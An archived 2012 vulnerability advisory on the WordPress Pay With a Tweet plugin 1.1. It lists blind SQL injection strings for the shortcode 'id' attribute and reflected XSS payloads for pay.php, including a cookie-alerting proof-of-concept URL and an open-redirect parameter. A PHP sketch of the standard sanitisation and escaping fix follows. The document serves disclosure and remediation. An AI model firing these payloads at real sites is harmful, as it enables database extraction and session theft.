WordPress plugin Pay With a Tweet <= 1.1: multiple vulnerabilities and fixes

2012-01-09T00:00:00
ID MYHACK58:62201232858
Type myhack58
Reporter Anonymous
Modified 2012-01-09T00:00:00

Description

Title: WordPress Pay With Tweet plugin <= 1.1 Multiple Vulnerabilities

Author: Gianluca Brindisi (gATbrindi.si, @gbrindisi, http://brindi.si/g/)

Download address: http://downloads.wordpress.org/plugin/pay-with-tweet.1.1.zip

Affected version: 1.1

1) Blind SQL Injection in shortcode:

The shortcode parameter 'id' is prone to blind SQL injection. You need to be able to write a post/page to exploit this:

[paywithtweet id="1' AND 1=2"]

[paywithtweet id="1' AND 1=1"]

2) Multiple XSS in pay.php

http://www.2cto.com/wp-content/plugins/pay-with-tweet.php/pay.php

After connecting to twitter:

?link=&22></input>[XSS]

After submitting the tweet:

?title=[XSS]&dl=[REDIRECT-TO-URL]%27)">[XSS]

The final download link will be replaced with [REDIRECT-TO-URL]

POC: pay.php?link=%22></input><script>alert(document.cookie)</script>&title=<script>alert(document.cookie)</script>&dl=http://brindi.si%27"><script>alert(document.cookie)</script>
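
Both issues come down to untrusted input reaching a sink unchanged: the shortcode attribute 'id' reaching a SQL query, and the request parameters link, title and dl reaching HTML output. The following is an added sketch of the usual WordPress-side handling, not the plugin's code and not from the advisory's author; the function names and the `pwt_example_buttons` table are hypothetical, and the output contexts shown for pay.php are assumptions.

```php
<?php
// Added example, not the plugin's code. Function, table and column names are hypothetical.

// 1) Shortcode: reduce 'id' to an integer and bind it; never concatenate it into SQL.
function pwt_example_shortcode( $atts ) {
    global $wpdb;
    $atts = shortcode_atts( array( 'id' => 0 ), $atts, 'paywithtweet' );
    $id   = absint( $atts['id'] ); // "1' AND 1=1" and "1' AND 1=2" both become 1
    if ( 0 === $id ) {
        return '';
    }
    $row = $wpdb->get_row(
        $wpdb->prepare(
            "SELECT id, title FROM {$wpdb->prefix}pwt_example_buttons WHERE id = %d",
            $id
        )
    );
    if ( null === $row ) {
        return '';
    }
    return sprintf(
        '<span class="pwt-button" data-id="%d">%s</span>',
        (int) $row->id,
        esc_html( $row->title )
    );
}
add_shortcode( 'paywithtweet', 'pwt_example_shortcode' );

// Read one query-string value as a string; arrays and missing keys become ''.
function pwt_example_param( $name ) {
    return ( isset( $_GET[ $name ] ) && is_string( $_GET[ $name ] ) ) ? wp_unslash( $_GET[ $name ] ) : '';
}

// 2) pay.php-style page: escape every request value for the context it is printed in.
function pwt_example_render_pay_page() {
    $title = pwt_example_param( 'title' );
    $link  = pwt_example_param( 'link' );
    // Assumption: downloads live on this site, so an off-site 'dl' falls back to home.
    $dl = wp_validate_redirect( esc_url_raw( pwt_example_param( 'dl' ) ), home_url( '/' ) );

    printf( '<h2>%s</h2>', esc_html( $title ) );                                 // HTML text
    printf( '<input type="hidden" name="link" value="%s">', esc_attr( $link ) ); // attribute
    printf( '<a href="%s">Download</a>', esc_url( $dl ) );                       // URL
}
```

Because both shortcode payloads above collapse to the same integer, the true/false difference that blind injection relies on disappears; a stricter handler could reject any 'id' that is not purely numeric instead of truncating it.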